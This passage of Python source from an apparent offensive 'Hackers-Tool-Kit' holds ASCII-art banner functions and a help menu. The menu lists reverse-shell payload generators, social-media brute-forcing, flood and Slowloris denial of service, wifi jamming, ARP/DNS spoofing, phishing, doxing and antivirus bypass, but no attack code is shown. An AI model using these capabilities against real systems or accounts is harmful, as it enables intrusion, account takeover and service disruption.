**,,,,,,,,,,,,,,*,,,,, *,,,,,,,,,*,,,,,,,,,** type ? for help + ,,,,,,,,,,,,,,,,,,,,,,,*,,,,,,,,,,,,,,,,,,,,,,, + ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, + ***********************************************\033[91m + + ▄████▄ █ ██ ▄▄▄█████▓ ██████ + ▒██▀ ▀█ ██ ▓██▒▓ ██▒ ▓▒▒██ ▒ + ▒▓█ ▄ ▓██ ▒██░▒ ▓██░ ▒░░ ▓██▄ + ▒▓▓▄ ▄██▒▓▓█ ░██░░ ▓██▓ ░ ▒ ██▒ + ▒ ▓███▀ ░▒▒█████▓ ▒██▒ ░ ▒██████▒▒ + ░ ░▒ ▒ ░░▒▓▒ ▒ ▒ ▒ ░░ ▒ ▒▓▒ ▒ ░ + ░ ▒ ░░▒░ ░ ░ ░ ░ ░▒ ░ ░ + ░ ░░░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ + ░ \033[0m + """.decode('utf-8') +def mainbanner6(): + print """ + |-|____________________ + /|_|_\ /__,''___ /____ /| + |\033[90mHHHHHH\033[0m| \_/ |\033[90mHHHHH\033[0m|/| + |``````|_________|`````| | + | \033[93m~~~~~~~~~~~~~~\033[0m | | + | .-/\-, | | + | _\\//_ | | + | \033[92m| /(_)|\033[0m | | + |\033[92m_______|_||.-.|_______\033[0m|/| + |\033[90mHHHHHHH\033[0m| ||:_ |\033[90mHHHHHHH\033[0m|/| + |\033[92m```````|_||:_)|```````\033[0m| | + | \033[92m|______| \033[0m| | + | ______ | | + | (__\033[90m24\033[0m__) | | + | ~~~~~~~~ | | + | By @tuf_unkn0wn | | + |______________________|/ + \033[91m + ) ( ) ( + ( /( )\ ) ( /( )\ ( ( ( + )\()|(_| /( ( )\()) ((_)))\ ( )\))( ( + ((_)\ _ )(_)) )\((_)\ _ /((_) )\ )((_))\ )\ + | |(_) ((_)_ ((_) |(_) | (_))( _(_/( (()(_|(_) + | '_ \ / _` / _|| / / | | || | ' \)) _` |(_-< + |_.__/_\__,_\__||_\_\ |_|\_,_|_||_|\__, |/__/ + |___/ + \033[90m + ) + (\033[33m + _ \033[0m___________ \033[90m)\033[33m + [_[\033[0m___________\033[91m#\033[0m + type ? for help + """.decode('utf-8') +def mainbanner7(): + os.system("cat /root/hackers-tool-kit/tools/skull.txt") +def mainbanner8(): + print """ + type ? for help\033[91m + +@@@ /$$ /$$ @@@ +@@@ | $$ | $$ @@@ +@@! | $$ | $$ @@! +!@! | $$$$$$$$ !@! +!!@ | $$__ $$ !!@ +!!! | $$ | $$ !!! +!!: | $$ | $$ !!: +:!: |__/ |__/ :!: +@@@ @@@\033[94m +@@@ @@@ +@@! @@! +!@! /$$$$$$$$ !@! +!!@ |__ $$__/ !!@ +!!! | $$ !!! +!!: | $$ !!: +:!:---------------| $$---------------:!: +@@@ | $$ @@@ +@@@ | $$ @@@ +@@! |__/ @@! +!@! !@!\033[91m +!!@ !!@ +!!! /$$ /$$ !!! +!!: | $$ /$$/ !!: +:!: | $$ /$$/ :!: +@@@ | $$$$$/ @@@ +@@@ | $$ $$ @@@ +@@! | $$\ $$ @@! +!@! | $$ \ $$ !@! +!!@ |__/ \__/ !!@ +!!! !!! +!!: !!: +:!: :!:\033[92m + :: :: +: @tuf_unkn0wn :\033[0m +""" +def mainbanner9(): + print """ +\033[91m╔\033[0m██████████████████████████████████████████████████████████████████\033[91m═╗ +║ ║ +\033[33m║ ║ +║\033[0m ▄▀▀▀▀▄ ▄▀▀▄ ▀▀▄ ▄▀▀▀▀▄ ▄▀▀▀█▀▀▄ ▄▀▀█▄▄▄▄ ▄▀▀▄ ▄▀▄ \033[33m║ +\033[93m║\033[0m █ █ ▐ █ ▀▄ ▄▀ █ █ ▐ █ █ ▐ ▐ ▄▀ ▐ █ █ ▀ █ \033[93m║ +║\033[0m ▀▄ ▐ █ ▀▄ ▐ █ █▄▄▄▄▄ ▐ █ █ \033[93m║ +\033[92m║\033[0m ▀▄ █ █ ▀▄ █ █ █ ▌ █ █ \033[92m║ +║\033[0m █▀▀▀ ▄▀ █▀▀▀ ▄▀ ▄▀▄▄▄▄ ▄▀ ▄▀ \033[92m║ +\033[1;36m║\033[0m ▐ █ ▐ █ █ ▐ █ █ \033[1;36m║ +║\033[0m ▐ ▐ ▐ ▐ ▐ \033[1;36m║ +\033[94m║\033[0m ▄▀▀█▄▄ ▄▀▀▀▀▄ ▄▀▀▄ ▄▀▀▄ ▄▀▀▄ ▀▄ \033[94m║ +║\033[0m █ ▄▀ █ █ █ █ █ ▐ █ █ █ █ █ \033[94m ║ +\033[34m║\033[0m ▐ █ █ █ █ ▐ █ █ ▐ █ ▀█ \033[34m║ +║\033[0m █ █ ▀▄ ▄▀ █ ▄ █ █ █ \033[34m║ +\033[95m║\033[0m ▄▀▄▄▄▄▀ ▀▀▀▀ ▀▄▀ ▀▄ ▄▀ ▄▀ █ \033[95m║ +║\033[0m █ ▐ ▀ █ ▐ \033[95m║ +\033[35m║\033[0m ▐ ▐ \033[35m║ +║ ║\033[1;31m +╚═\033[0m█████████████████████████████████████████████████████████████████\033[1;31m═╝\033[0m + type ? for help + """.decode('utf-8') + +def mainbanner10(): + print """\033[0m + ░░░▓█▒░▒▒▒▓▓░ + ░░░░░▓▓░▒▓▓▓▓▓▓▓▓▓▓▓█░░░░ + ░░█▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓░░ + ░░█▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓░░░ + ░░░░ ░░▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██░░ ░░░░ + ░░░░░░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓████████▒░░ ░░▓▒▒▒▒▓░░ + ░▓░▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██████████████████▓░░░░░▒▓▓▓▓▓▓███████ + ░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█████████████████████████████████░░░░░░░ + ░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█▓▓▓▓██████████████████████████████████░ + ░█▓▓▓██████████▓▓▓▓▓▓▓▓▓▓▓▓▓██████████████████████████████████▒░ + ░▒▓▓▓████░░░░░░░░░░░░░▒▓███████████████████████████████████████░░ + ░▓▓▓███▒▒░░░░░░░░░░░░░░░░░░░░▒██▓██████████████████████████████░░ + ░█▓▓███░░░░░░░░░░░░░░░░░░░░░░░░░░░▒███████████████████████████▓░ + ░█▓▓███▒░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░█████████████████░░░░░░░░░ + ░░▓▓████░░░░░░░░░░░░░░░░░░░░████▓░░░░░░░░█████████████▓░ + ░█▓█████░░░░░░░░░░░░░░░░░▒░████████░░░░░░░████████████░░ + ░░▒▓█████░░░░▒░▓████░░░░░░▒░█████████▓░░░░░███████████▓░░░░░ + ░░▓▒▓█████░░░▒░▓██████░░░░░▒░▓█████████░░░░░▒██████████░░▒▒▓░ + ░░█▒▓▓████▒░░░░███████▓░░░░░▒░░████████▓░░░░▒████████░▓░▓▓░▓▓░░░ + ░░░▒▓▓▓████░░░░▓██████▓░░░░░░▒░░░▓█████░░░░░███████▓░▓▓▓▓▓▓▒▒░░░ + ░▒▒▓▓████░░▒░░██████░░░░░░░░░▒░░░░░░▒░░░░░████▓░▒▓▓▓▓▓░░░▒▒▒░▒░ + ░░▓▓████░░░▒░░▒███░░▒▓▒▒█▓░░░░░░░░░░░░░▒██▓▒▓▓▓▓▓▓▒░░░░░░▒▒▒▒▒░░ + ░░░░████░░░░░░░░░░░░░█░░▓█▓░░░░██████████▒▒▓▓▓▓░░░░░▒░░░░░▒▒▒▒▒░ + ░░░░░░ ░░████░░░░░░░░░░░░░░░░░░░░░░███████▓▒▓▓░░░░░░░ ░░░░░░░▒▒▒░▒░ + ░▒░░▒░░░▒░▒█████▓▒░▒█░░░░░░░░░░░░░░░░███▓▒▓▒░░ ░▒░░░░▒▒▒░░░░ + ░░▒░▒░░░░░░░██████████░░░░░░▒░░░▒░░▒▒▒▒▒▒▒░░░ ░▒░░░░▒▒░▒░░ + ▒░░░░░▒▒▒░░░░░░██████░░▒▒▒▒▒▒▒▒▒▓█▓▓▒▒▓▓▓█░ ░░▒░░░░▒▒▒░░ + ░░░░░░▒▒░░░░ ░░▓▓▓▓▓▓▓█▓▓▒▒▓▓█▓▓▓▓▓█ \033[92m@tuf_unkn0wn\033[0m ░░░░░░░▒░░░ + ░░▒░░░░░▒▓█ ░▒▒▓▓▓▓█▓█▓▓▒▒▓▓██▓▓▓▓▓▓█ \033[94mtype ? for help\033[0m ░░░░░▒▒░░ + ░▒░░░░█▓██▒░▒▓▓██▓▒▒▒▒▓▒▓▓████▓▓▓▓▓██▒ ▒░░░░░▒░░ + ░░▓▒█▓▓▓▓▓▓▓██▓▒▒░▒▒▒▒█▓▓███▓▓▓▓▓▓█░ ▒░░░░▒░ + ░▒███▓▓▓▓▓▓▓▓▓▓▒▒▒▒▒▒▒░▒████▓▓▓▓▓▓▒░ ▒░░░░░ + ░████▓▓▓▓▓▓▓▒▓▓▓▓█▒▒░░▒░█▓█▓█▓████░ ▒░░▒░░ + ░▓██▓▓▓▓▓▒▓▓▓▓▓▓▓▓▓▓▓▓▒▒▓▓█▓▓▓▓██▒░ ░░▒░ + ░░██▓▓▒▓▓██▓▓▓▓▓▓▓▓▓████▓▓▓▓█▓▓█░░░ + ░██▓▓███▒▓▓▓▓▓▓▓▓▓█████▓██▓██░░ + ░░█▓█░░ ░▒▒▓▓▓▓▓▓▓▓▓███▓██▓█░ + ▓█░ ░█▓▓▓▓▓▓▓▓▓████▓███░ ░ + ░█▓▓▓▓▓▓███████▓██▓██░ + ░██▓▓▓████████████████░░░ + ░▓▓▓▓▓███████▓█▓████████░ ░░░ + ░░░█▓█████████████████████████▓▓▓▒░░░░░░ + ░░░▒█▓█▓██████████████████████▓███████████████░░░░░░░░░ + ▓█▒▓▓▓▓▓▓█████████████████████████████████████████████████░ + ░█▓▓▓▓▓▓▓▓▓█████████████████████████████████████▒░░░ ░ ░░░░ + ░░▓█▓█▓█████████████████████████████░░ + \033[0m""".decode('utf-8') +def mainbanner11(): + print """\033[91m + ██████╗ ██████╗ ██████╗ + ██╔════╝ ██╔════╝ ██╔════╝ + ███████╗ ███████╗ ███████╗ + ██╔═══██╗██╔═══██╗██╔═══██╗ + ╚██████╔╝╚██████╔╝╚██████╔╝ + ╚═════╝ ╚═════╝ ╚═════╝ + ░░░░ ░░░░░ + ░▒███████▓▒░░ ░░░████████▓░░░ + ░▓████████████▒░░ ░░█████████████░░ + ▒▓░ ░░████████░░ ░░████████░░░ ░░▒█░ + ░ ░██████▒░ ░░░░███████ ░░ + ░░███████░░ ░░██████▓░ + ░███████░░ ░▒██████▒ + ░░░░ ░░███████░░░███████▒░ ░░░ + ░░░░░ ░░░███████░████████░░░ ░░░ ░░░░ + ░░▓████▓▒░░░░▒▒███████████████░░░░░░░▒▓████░ ░ + ░▒██████████████▒████████▒██████████████░░ + ░░██████████████▒░███▒▒▒█████████████░░ + ░░░░▓████████░█░▓▓▒████████▒░░░░░ + ░░████████▓░██░████████▒░░░ + ░░▒██████░▒▒░░▒░░██████░ + ░░█████████▓░█░████▓███▓░ + ░▒█▓░▒██████▒███████░░█▓░ + ░░░███████████████████▓░░ + ░▒▓████████████████▒░ + ░░▒███████████████▓▒░ + ░▒█████▓██████░░ + ░██████████░ + @tuf_unkn0wn ░█████████▒ type ? for help + █████████░░ + ░░████████░░ + ░▓█████▓░ + ░▓████▒░ + ░░████░ + ░░░▒██░░ + ░█▓░ + ░░▓░░ + ░░░░░ + ░░ + \033[0m""".decode('utf-8') +def mainbanner12(): + print """\033[91m + + +██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ +██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ +███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ +██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ +██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ +╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ + + + """.decode('utf-8') +def mainbanner13(): + print """\033[92m + + +██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ +██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ +███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ +██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ +██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ +╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ + + + """.decode('utf-8') +def mainbanner14(): + print """\033[34m + + +██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ +██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ +███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ +██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ +██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ +╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ + + + """.decode('utf-8') +def mainbanner15(): + print """\033[93m + __ _ + _wr"" "-q__ + _dP 9m_ + _#P 9#_ + d#@ \033[92mtype ? for help\033[93m 9#m + d## ### + J### ###L + {###K J###K + ]####K ___aaa___ J####F + __gmM######_ w#P"" ""9#m _d#####Mmw__ + _g##############mZ_ __g##############m_ + _d####M@PPPP@@M#######Mmp gm#########@@PPP9@M####m_ + a###"" ,Z"#####@" '######"\g ""M##m + J#@" 0L "*## ##@" J# *#K + #" `# "_gmwgm_~ dF `#_ +7F "#_ ]#####F _dK JE +] *m__ ##### __g@" F + \033[92m@tuf_unkn0wn\033[93m "PJ#####LP" \033[92mhackers-tool-kit\033[93m + ` 0######_ ' + _0########_ + . _d#####^#####m__ , + "*w_________am#####P" ~9#####mw_________w*" + ""9@#####@M"" ""P@#####@M"" +\033[92m + ██░ ██ ▄▄▄█████▓ ██ ▄█▀ + ▓██░ ██▒▓ ██▒ ▓▒ ██▄█▒ + ▒██▀▀██░▒ ▓██░ ▒░▓███▄░ + ░▓█ ░██ ░ ▓██▓ ░ ▓██ █▄ + ░▓█▒░██▓ ▒██▒ ░ ▒██▒ █▄ + ▒ ░░▒░▒ ▒ ░░ ▒ ▒▒ ▓▒ + ▒ ░▒░ ░ ░ ░ ░▒ ▒░ + ░ ░░ ░ ░ ░ ░░ ░ + ░ ░ ░ ░ ░\033[0m + """.decode('utf-8') +def mainbanner16(): + print """\033[91m + :PB@Bk: + ,jB@@B@B@B@BBL. + 7G@B@B@BMMMMMB@B@B@Nr + :kB@B@@@MMOMOMOMOMMMM@B@B@B1, + :5@B@B@B@BBMMOMOMOMOMOMOMM@@@B@B@BBu. + 70@@@B@B@B@BXBBOMOMOMOMOMOMMBMPB@B@B@B@B@Nr + G@@@BJ iB@B@@ OBMOMOMOMOMOMOM@2 B@B@B. EB@B@S + @@BM@GJBU. iSuB@OMOMOMOMOMOMM@OU1: .kBLM@M@B@ + B@MMB@B 7@BBMMOMOMOMOMOBB@: B@BMM@B + @@@B@B 7@@@MMOMOMOMM@B@: @@B@B@ + @@OLB. BNB@MMOMOMM@BEB rBjM@B + @@ @ M OBOMOMM@q M .@ @@ + @@OvB B:u@MMO\033[31mMOMMBJiB .BvM@B + @B@B@J 0@B@MMOMOMOMB@B@u q@@@B@ + B@MBB@v G@@BMMMMMMMMMMMBB@5 F@BMM@B + @BBM@BPNi LMEB@OMMMM@B@MMOMM@BZM7 rEqB@MBB@ + B@@@BM B@B@B qBMOMB@B@B@BMOMBL B@B@B @B@B@M + J@@@@PB@B@B@B7G@OMBB. ,@MMM@qLB@B@@@BqB@BBv + iGB@,i0@M@B@MMO@E : M@OMM@@@B@Pii@@N: + . B@M@B@MMM@B@B@B@MMM@@@M@B + @B@B.i@MBB@B@B@@BM@::B@B@ + B@@@ .B@B.:@B@ :B@B @B@O + :0 r@B@ B@@ .@B@: P: + vMB :@B@ :BO7 + ,B@B\033[0m + + \033[32m╔═══\033[93m+\033[0mHackers-Tool-Kit\033[93m+\033[32m════╗\033[0m + ███████████████████████████ + type █?█ for help + ███ + \033[31m▄▄ ▄▄ \033[0m███\033[31m ▄▄ ▄▄▄ + ██ ██ \033[0m███\033[31m ██ ██▀ + ██ ██ \033[0m███\033[31m ██▄██ + ████████ \033[0m███\033[31m █████ + ██ ██ \033[0m███\033[31m ██ ██▄ + ██ ██ \033[0m███\033[31m ██ ██▄ + ▀▀ ▀▀ \033[0m▀▀▀\033[31m ▀▀ ▀▀\033[0m + """.decode('utf-8') +def mainbanner17(): + print """ + + .---. + |---| + type |-\033[32m?\033[0m-| for help + |---| + .---^ - ^---. + :___________: + \033[31m▄█ █▄\033[0m | |//| \033[32m▄█ ▄█▄\033[0m + ███ ███ | |//| ███ ▄███▀ + ███ ███ | |//| ███▐██▀ + ███▄▄▄▄███ | |//| █████▀ + ███▀▀▀▀███ | |//| █████▄ + ███ ███ | |//| ███▐██▄ + ███ ███ | |.-| ███ ▀███▄ + \033[31m███ ███\033[0m |.-'**| \033[32m███ ▀█▀\033[0m + \***/ + \*\033[91m/\033[31m + V\033[0m + """.decode('utf-8') +def mainbanner18(): + print """ + Type \033[31m?\033[0m For\033[31m Help\033[0m +\033[31m╔═══╗ ╔═══╗ ╔═════════════════════╗ ╔═══╗ ╔═══╗ +║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTKHTKHTKHTKHTKHTKHTK\033[31m║ ║\033[0mHTK\033[31m║ ╔╝\033[0mHTK\033[31m║ +║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTKHTKHTKHTKHTKHTKHTK\033[31m║ ║\033[0mHTK\033[31m║ ╔═╝\033[0mHTK\033[31m╔╝ +║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ╚════════╗\033[0mHTK\033[31m╔════════╝ ║\033[0mHTK\033[31m║ ╔╝\033[0mHTK\033[31m╔═╝ +║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║╔╝\033[0mHTK\033[31m╔╝ +║\033[0mHTK\033[31m╚═══════════╝\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m╚╝\033[0mHTK\033[31m╔╝ +║\033[0mHTKHHHHHHHHHHHHHHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK HTK\033[31m╔╝ +║\033[0mHTKTTTTTTTTTTTTTHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTKHTK \033[31m╚╗\033[0m +║\033[31mHTKKKKKKKKKKKKKKHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m╔╗\033[31mHTK\033[0m╚═╗ +║\033[31mHTK\033[0m╔═══════════╗\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║╚═╗\033[31mHTK\033[0m╚╗ +║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m╚╗ +║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m╚╗ +║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m╚╗ +║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m║ +╚═══╝ ╚═══╝ ╚═══╝ ╚═══╝ ╚═══╝ + """.decode('utf-8') +def mainbanner19(): + print """\033[31m + # # + # # + %# \033[0m@tuf_unkn0wn\033[31m ## + ,%/ /%, + %## ##% + &%## ##%& + ,%%#####/. ,/#####%%, + %&%%#####/ \033[0m████\033[31m /#####%%&% + .&&%%%&& \033[0m████\033[31m &&%%%&&. + /&%( \033[0m████\033[31m (%&( + \033[0m████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + \033[31m██████\033[31m type \033[0m█\033[31m??\033[0m█ \033[31mfor help ██████ +██ \033[0m██████████████████████████████\033[31m ██ +███████ \033[0m██████████████████████████████\033[31m ███████ +██ ██ \033[0m████ \033[31m ██ ██ + ██████ \033[0m████ \033[31m ██████ + ▒ ▓▒ ▒ ▒ ▓▒ ▒ + ░ ▒ ░ ██████ ░ ▒ ░ + ░ ░ ██ ░ ░ + ███████ + ██ ██ + ██████ + ▒ ▓▒ ▒ + ░ ▒ ░ + ░ ░\033[0m + """.decode('utf-8') +def mainbanner20(): + print """ + + + ██╗\033[31m██╗ ██╗\033[0m██╗ ██╗\033[92m████████╗\033[0m██╗ ██╗\033[34m██╗ ██╗\033[0m██╗ + ██╔╝\033[31m██║ \033[31m██║\033[0m╚██╗ ██╔╝\033[92m╚══\033[92m██╔══╝\033[0m╚██╗ ██╔╝\033[34m██║ ██╔╝\033[0m╚██╗ +██╔╝ \033[31m███████║ \033[0m╚██╗██╔╝\033[92m ██║ \033[0m╚██╗██╔╝\033[34m █████╔╝ \033[0m╚██╗ +╚██╗ \033[31m██╔══██║ \033[0m██╔╝╚██╗ \033[92m██║ \033[0m ██╔╝╚██╗\033[34m ██╔═██╗\033[0m ██╔╝ + ╚██╗\033[31m██║ ██║\033[0m██╔╝ ╚██╗\033[92m ██║ \033[0m ██╔╝ ╚██╗\033[34m██║ ██╗\033[0m██╔╝ + ╚═╝\033[31m╚═╝ ╚═╝\033[0m╚═╝ ╚═╝\033[92m ╚═╝ \033[0m ╚═╝ ╚═╝\033[34m╚═╝ ╚═╝\033[0m╚═╝ + Created by @tuf_unkn0wn type ? for help + + """.decode('utf-8') +def mainbanner21(): + os.system("cat /root/hackers-tool-kit/tools/venombanner.txt") + +def mainbanner22(): + print """{0} + + ██ ██ ██ ██ ███ + ██ ███ █████████ ███ ▄█ █▀ + ███ ███ ███ ███▐██▀ + ███▄▄▄▄███ ██{1} █████▀ + ██ ▀▀▀▀███ ███ ████▄ + ███ ███ ███ ███▐██▄ + ███ ██ ██ ██ ▀█ █▄ + {2} ███ ███ █ ███ ███ + + """.decode('utf-8').format(random.choice(colorlist), random.choice(colorlist), random.choice(colorlist)) + + +def mainbanner(): + import random + for x in range(10): + num = random.randint(1,22) + if num == 1: + mainbanner1() + if num == 2: + mainbanner2() + if num == 3: + mainbanner3() + if num == 4: + mainbanner4() + if num == 5: + mainbanner5() + if num == 6: + mainbanner6() + if num == 7: + mainbanner7() + if num == 8: + mainbanner8() + if num == 9: + mainbanner9() + if num == 10: + mainbanner10() + if num == 11: + mainbanner11() + if num == 12: + mainbanner12() + if num == 13: + mainbanner13() + if num == 14: + mainbanner14() + if num == 15: + mainbanner15() + if num == 16: + mainbanner16() + if num == 17: + mainbanner17() + if num == 18: + mainbanner18() + if num == 19: + mainbanner19() + if num == 20: + mainbanner20() + if num == 21: + mainbanner21() + if num == 22: + mainbanner22() + +#--------------------------# +#MAIN STARTING BANNER END# + + +#HELP BANNER START# +#-----------------# +def help(): + print B+""" +▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ + ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ + ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ +\033[0m ░ +? : displays this message +reboot : reboot hackers-tool-kit +update : update the hackers-tool-kit +clear : clears screen +banner : clears screen and shows new banner +exit : exits script +restart : re run hackers-tool-kit +rebootl : reboot whole device +winload : windows reverse_tcp payload +andload : android reverse_tcp payload +connect : connect to a host +command : execute terminal command +msfcon : metasploit console +set : setoolkit console +msfven : msfvenom +gmail : gmail bruteforce +insta : instagram bruteforce +fb : facebook bruteforce +hydra : Black-Hydra bruteforce +medusa : Medusa bruteforce +ipgrab : host to ip address +myip : show your ip +wifite : automated wifi hacker +reaver : reaver automated [ wifi hack ] +aircrack: aircrack-ng automated [ wifi hack ] +mon : put device in monitor mode +monoff : put device out of monitor mode +netdev : find all devices in your network +scannet : scan for networks around you +specnet : scan a specific network +port : scan for ports on a host +specscan: specific info gather on a host +info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m +sysinfo : info about your system \033[91m ██ ██\033[0m +msfex : shows all metasploit exploits \033[91m ██ ██\033[0m +msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfall : shows all metasploit modules \033[91m ██ ██\033[0m +udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m +tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m +syn : SYN flood / dos \033[91m █ █\033[0m +slowl : Slow Loris dos \033[91m █ █ \033[0m +ping : pings host \033[91m █ █\033[0m +multih : start a multi handler \033[91m █ █\033[0m +cupp : make wordlists \/ vvvvvvvvv \/ +vdir : view files of a directory +vpn : activate a vpn +vpnoff : stop vpn +pidox : dox website +pingen : Generate a routers default pin +deauth : deauth attack / wifi jammer +macc : changes mac address +macoff : returns mac address to normal Hackers-Tool-Kit +arpspoof: arp spoofing | +sslscan : ssl scan a host ██╗ ██╗ ████████╗ ██╗ ██╗ +payload : make a metasploit payload of your choice ██║ ██║ ╚══██╔══╝ ██║ ██╔╝ +crunch : Make wordlists ███████║\033[91m█████\033[0m╗██║\033[91m█████\033[0m╗█████╔╝ +traff : shows your internet traffic ██╔══██║╚════╝██║╚════╝██╔═██╗ +resa : reset account password ██║ ██║ ██║ ██║ ██╗ +resu : reset unix password ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ +hashid : find the type of hash of a hash | +wafwoof : check a web application for firewall Hackers-Tool-Kit +cloud : cloudflare bypass +brutex : auto bruteforce every service of a host +methelp : show meterpreter help +winbyp : windows defender bypass +exploit : use a metasploit exploit of your choice +phish : phishing automated +datalist: list all hosts & services in the database +msfev : shows all metasploit evasions +upgrade : fully update your linux os +nscript : use a nmap script +sshver : scan for ssh version on a host +chains : browse web anonymous via proxychains [proxychains setup required] +mysqlv : scan for mysql version on a host +terminal: open another new terminal +source : get source code from a website +dirscan : web directory scanner / bruteforce +aserver : start a apache server +run : run a file +phpload : make a php reverse_tcp payload and start it in a multi handler +pyload : make a python reverse_tcp payload and start it in a multi handler +foxhis : gather firefox history from privileged javascript shell +rhawk : run the RED_HAWK script (info gathering tool) +nano : open nano text editor +compilec: compile a c file +dnsspoof: dns spoofing [type dnsspoofall to spoof entire subnet] +htk-lite: run a lighter version of hackers-tool-kit +\033[91m---------------------------------------------------------------------------------\033[0m + """ +#-----------------# +#HELP 